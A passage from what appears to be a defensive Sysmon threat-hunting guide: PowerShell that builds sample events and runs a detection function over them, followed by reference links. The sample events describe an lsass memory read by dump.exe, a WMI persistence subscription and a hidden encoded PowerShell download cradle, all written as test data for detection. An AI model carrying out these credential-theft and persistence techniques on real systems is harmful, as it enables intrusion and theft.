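    (New-SampleEvent 1  @{ Image='C:\Windows\System32\wbem\WmiPrvSE.exe'; CommandLine='C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding'; User='NT AUTHORITY\NETWORK SERVICE' })
    (New-SampleEvent 10 @{ SourceImage='C:\Windows\System32\VBoxService.exe'; TargetImage='C:\Windows\system32\csrss.exe'; GrantedAccess='0x1400' })
    (New-SampleEvent 10 @{ SourceImage='C:\Users\Gen Eric\AppData\Local\Temp\dump.exe'; TargetImage='C:\Windows\system32\lsass.exe'; GrantedAccess='0x1010' })
    (New-SampleEvent 19 @{ Name='MaliciousSubscription'; Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ''Win32_PerfFormattedData_PerfOS_System'' AND TargetInstance.SystemUpTime >= 240'; User='GenEric-PC\Gen Eric' })
    (New-SampleEvent 20 @{ Name='MaliciousSubscription'; Type='Command Line'; Destination="$psExe -NonI -W hidden -enc $b64"; User='GenEric-PC\Gen Eric' })
    (New-SampleEvent 21 @{ Filter='__EventFilter.Name="MaliciousSubscription"'; Consumer='CommandLineEventConsumer.Name="MaliciousSubscription"'; User='GenEric-PC\Gen Eric' })
)

$events = $sample | ConvertFrom-SysmonEventXml
Find-SysmonIndicators $events | Format-Table -AutoSize -Wrap
```

Against the live log, replace the constructed `$sample` with `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -MaxEvents 5000 | ForEach-Object { $_.ToXml() }`; the rest of the pipeline is unchanged. The expected findings on the sample set are one EncodedPowerShell (the decoded download cradle), one LsassMemoryRead (dump.exe, 0x1010), and one WmiPersistence entry whose Detail shows the WQL trigger next to the decoded command the consumer would run.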
Sources:
- Cyberwardog.blogspot.com
- https://www.crowdstrike.com/blog/sysmon-2/
- https://www.rsaconference.com/writable/presentations/file_upload/hta-w05-tracking_hackers_on_your_network_with_sysinternals_sysmon.pdf
- https://medium.com/@haggis_m/hunting-with-sysmon-38de012e62e6
- https://nosecurecode.blog/2017/06/10/updated-sysmonview/
- http://909research.com/sysmon-the-best-free-windows-monitoring-tool-you-arent-using/
- https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon
- https://github.com/nshalabi/SysmonTools
Great Sysmon use cases
- BotConf2016 Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk), Tom Ueltschi 2016 (Slides)
- BotConf2016 Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk), Tom Ueltschi 2016 (Video)
- Microsoft Sysmon Deployment 2017, Dimitris Margaritis (Slides)
- Splunkmon: Taking Sysmon to the Next Level (Whitepaper)
- Posh-Sysmon Module for Creating Sysmon Configuration Files 2017 (Article)
- How to Go from Responding to Hunting with Sysinternals Sysmon, RSAC 2017 (Slides)
- Hunting with Sysmon, Michael Haag 2017 (Article)
- sysmon-dfir, Michael Haag (MHaggis) (GitHub)
- Sysinternals Sysmon unleashed (Article)
- SwiftOnSecurity Sysmon Config 2017 (GitHub)
- Explaining and adapting Tay's Sysmon Configuration (Article)